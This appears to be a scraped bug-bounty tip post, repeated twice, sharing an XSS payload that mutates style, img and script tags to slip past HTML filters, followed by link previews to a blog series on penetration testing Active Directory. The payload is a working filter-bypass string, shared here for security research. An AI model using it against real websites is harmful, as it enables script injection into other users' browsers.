[XSS] #BugBountyTips
Found a weird XSS filter bypass using this payload:
<style/><img src="z'z</style><script/z>alert(1)</script>">
#BugBounty @XssPayloads
Found a weird XSS filter bypass using this payload:
<style/><img src="z'z</style><script/z>alert(1)</script>">
#BugBounty @XssPayloads
https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
hausec
Penetration Testing Active Directory, Part I
I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’…